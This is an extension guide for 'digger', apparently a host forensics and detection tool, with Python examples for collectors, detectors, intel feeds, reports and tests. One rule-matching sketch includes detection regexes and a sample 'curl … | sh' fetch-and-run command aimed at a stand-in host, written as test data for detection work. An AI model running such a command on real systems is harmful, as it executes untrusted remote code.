Extending digger

Write a new collector, detector, framework, or intel feed.

A new collector

Subclass Collector, set the class-level metadata attributes (name, category, supported_os, requires_admin, and description), yield artifacts from collect(), and register the class.

--- digger/collectors/macos/my_collector.py ---

from pathlib import Path
from typing import Iterable

from digger.core.collector import Collector
from digger.core.evidence import Artifact
from digger.core.platform import OS


class SafariWebsiteDataCollector(Collector):
    name = "macos.safari_website_data"
    category = "browser"
    supported_os = (OS.MACOS,)
    requires_admin = False
    description = "Safari WebKit website data plist."

    def collect(self) -> Iterable[Artifact]:
        p = Path.home() / "Library/Safari/WebsiteData.plist"
        # Missing file: yield nothing rather than raise.
        if not p.exists():
            return
        try:
            # Reading confirms the file is accessible; only its size is recorded.
            data = p.read_bytes()
        except (PermissionError, OSError):
            return
        yield self.make(
            subject=str(p),
            path=str(p),
            size=len(data),
        )

Register in digger/collectors/__init__.py in the appropriate OS-specific list:

def _macos() -> list[Collector]:
    ...
    from digger.collectors.macos.my_collector import SafariWebsiteDataCollector
    return [
        ...,
        SafariWebsiteDataCollector(),
    ]

Graceful degradation. A collector that can't read what it needs should yield nothing and return; it should never raise. Wrap risky calls in try/except (PermissionError, OSError, subprocess.SubprocessError). Check shutil.which() before shelling out.
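
The graceful-degradation rule can be sketched as a small wrapper around external commands. This is only an illustration under stated assumptions: run_tool is a hypothetical helper name, not part of digger, and the 10-second timeout is an arbitrary choice.

```python
import shutil
import subprocess
from typing import Optional, Sequence


def run_tool(argv: Sequence[str], timeout: float = 10.0) -> Optional[str]:
    """Return the tool's stdout, or None if it is missing or fails.

    Hypothetical helper for illustration; not part of digger.
    """
    # Skip quietly when the binary is not on PATH.
    if not argv or shutil.which(argv[0]) is None:
        return None
    try:
        proc = subprocess.run(
            list(argv),
            capture_output=True,
            text=True,
            errors="replace",  # never raise on undecodable output
            timeout=timeout,
            check=True,
        )
    except (PermissionError, OSError, subprocess.SubprocessError):
        # CalledProcessError and TimeoutExpired both derive from SubprocessError.
        return None
    return proc.stdout
```

Inside collect(), a None result would simply mean "yield nothing and return".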

A new detector

--- digger/detectors/my_detector.py ---

from typing import Iterable
from digger.core.evidence import EvidenceStore, Finding
from digger.detectors.base import Detector


class CrontabCommentDetector(Detector):
    name = "crontab_comment_anomaly"
    description = "Crontab entries with unusual commenting patterns."

    def detect(self, store: EvidenceStore) -> Iterable[Finding]:
        for art in store.iter_artifacts(collector="linux.cron"):
            contents = art["data"].get("contents") or ""
            if "###" in contents or "@@" in contents:
                yield Finding(
                    detector=self.name,
                    severity="low",
                    title=f"Unusual comment style in {art['subject']}",
                    summary="Crontab uses comment markers (###/@@) atypical for the system.",
                    artifact_refs=[art["artifact_uuid"]],
                    evidence={"path": art["data"].get("path")},
                    mitre="T1053.003",
                )

Register in digger/detectors/__init__.py:all_detectors(). Order mostly doesn't matter, but keep TimelineBuilder last.

Data-driven detector

If your detector logic is "match a list of patterns/signatures," put the patterns in YAML under digger/rules/<topic>/<file>.yaml and load them via the shared helpers:

from digger.detectors._rules_io import load_yaml, load_intel

rules = load_yaml("my_topic/my_rules.yaml")    # bundled file
live  = load_intel("my_feed_name")             # live intel cache (None if empty)

This pattern is used by shai_hulud, supply_chain, c2, and threat_actor. It keeps the rule data auditable and updatable without touching code.
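
As a rough sketch of the matching step, assume a rule file that parses to a dict with a patterns list of id/regex/severity entries. That schema and the names compile_rules and match_rules are hypothetical; the real layout of digger's rule files is not shown on this page. The inline RULES dict stands in for whatever load_yaml would return.

```python
import re
from typing import Iterator

# Stand-in for the parsed contents of a bundled YAML rule file (hypothetical schema).
RULES = {
    "patterns": [
        {"id": "curl-pipe-sh", "regex": r"curl\s+[^|]*\|\s*(ba)?sh", "severity": "high"},
        {"id": "base64-decode", "regex": r"base64\s+(-d|--decode)", "severity": "medium"},
    ]
}


def compile_rules(rules: dict) -> list[tuple[dict, re.Pattern]]:
    """Compile each rule's regex once so matching stays cheap per artifact."""
    return [(r, re.compile(r["regex"])) for r in rules.get("patterns", [])]


def match_rules(text: str, compiled: list[tuple[dict, re.Pattern]]) -> Iterator[dict]:
    """Yield the rule dict for every pattern found in text."""
    for rule, pattern in compiled:
        if pattern.search(text):
            yield rule


compiled = compile_rules(RULES)
hits = [r["id"] for r in match_rules("curl http://x.example/i.sh | sh", compiled)]
```

A detector's detect() would then turn each matched rule into a Finding, taking the severity and title from the rule data rather than from code.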

A new intel feed

Add an entry to the FEEDS list in digger/intel/feeds.py:

FEEDS.append(Feed(
    name="my_corp_blocklist",
    url="https://intel.corp.example/blocklist.txt",
    interval=3600,                               # poll hourly
    parser=parse_lines,                          # uses bundled helper
    description="Internal IP blocklist maintained by corp SOC.",
    headers={"Authorization": "Bearer XXXXX"},   # if needed
))

Parsers receive raw bytes and return a JSON-serializable dict. Existing parsers cover JSON, CSV, Spamhaus-DROP-style, and one-per-line text; write your own if needed.
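
A custom parser following that contract might look like the sketch below. The name parse_commented_lines is hypothetical, and the "entries" key is an assumption chosen to match the bl.get("entries", []) lookup in the detector snippet in this section.

```python
def parse_commented_lines(raw: bytes) -> dict:
    """Parse one-entry-per-line text, ignoring blank lines and '#' comments.

    Hypothetical parser for illustration; not one of digger's bundled helpers.
    """
    entries = []
    for line in raw.decode("utf-8", errors="replace").splitlines():
        # Drop any trailing comment, then surrounding whitespace.
        value = line.split("#", 1)[0].strip()
        if value:
            entries.append(value)
    # Only str and list values, so the result is JSON-serializable.
    return {"entries": entries}
```

Decoding with errors="replace" keeps a single malformed byte in the feed from failing the whole refresh.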

Detectors load the cache by name:

from digger.detectors._rules_io import load_intel

bl = load_intel("my_corp_blocklist") or {}
bad_ips = set(bl.get("entries", []))
for art in store.iter_artifacts(collector="network"):
    raddr = art["data"].get("raddr")
    if raddr and raddr[0] in bad_ips:
        yield Finding(...)

A new compliance framework

Drop a YAML file under digger/compliance/frameworks/. See the Compliance page for the predicate vocabulary and an example. No code change required — digger compliance list discovers it automatically.

A new report format

Reports are pure functions: render_X(store: EvidenceStore) -> str. Drop a module under digger/report/, expose render_…, wire it into digger/report/__init__.py and into cli.py:cmd_report's renderers dict.
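
A renderer in that shape could be as small as the sketch below. It assumes findings come back from iter_findings() as dict-like records with severity and title keys; render_severity_summary and FakeStore are hypothetical names, and FakeStore is only an in-memory stand-in for EvidenceStore.

```python
from collections import Counter
from typing import Iterable, Protocol


class FindingSource(Protocol):
    """The only part of the store this sketch relies on."""

    def iter_findings(self) -> Iterable[dict]: ...


def render_severity_summary(store: FindingSource) -> str:
    """Return per-severity counts followed by one line per finding title."""
    findings = list(store.iter_findings())
    counts = Counter(f.get("severity", "unknown") for f in findings)
    lines = [f"{sev}: {n}" for sev, n in sorted(counts.items())]
    lines += [f"- [{f.get('severity', 'unknown')}] {f.get('title', '')}" for f in findings]
    return "\n".join(lines) + "\n"


class FakeStore:
    """In-memory stand-in for EvidenceStore, used only to exercise the renderer."""

    def __init__(self, findings: list[dict]) -> None:
        self._findings = findings

    def iter_findings(self) -> Iterable[dict]:
        return iter(self._findings)


report = render_severity_summary(FakeStore([
    {"severity": "low", "title": "Unusual comment style"},
    {"severity": "high", "title": "Known-bad IP contacted"},
]))
```

Because the function only reads from the store and returns a string, it can be tested without touching the filesystem or the CLI.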

A new exporter

Same pattern: pure function over the evidence store under digger/exchange/, plus a CLI sub-command in cli.py. Use digger/tradecraft/tlp.py's apply_tlp_filter() to respect sharing markings.

Tests

Drop tests under tests/ (filename test_*.py). The harness is plain pytest; no custom fixtures or plugins are required, only the built-in tmp_path fixture. For collector and detector tests, build a temporary EvidenceStore on a tmp_path, seed it with synthetic artifacts, and assert on the emitted findings.

def test_my_detector_catches_x(tmp_path):
    from digger.core import Artifact, EvidenceStore
    # MyDetector is a placeholder: import the detector under test from your own module.
    store = EvidenceStore(tmp_path)
    try:
        store.add_artifact(Artifact(collector="processes", category="process",
                                    subject="pid=1", data={"name": "evil"}))
        n = MyDetector().run(store)
        assert n >= 1
        assert any("evil" in f["title"] for f in store.iter_findings())
    finally:
        # Close the store even when an assertion fails.
        store.close()

Run with:

python -m pytest tests/test_my_module.py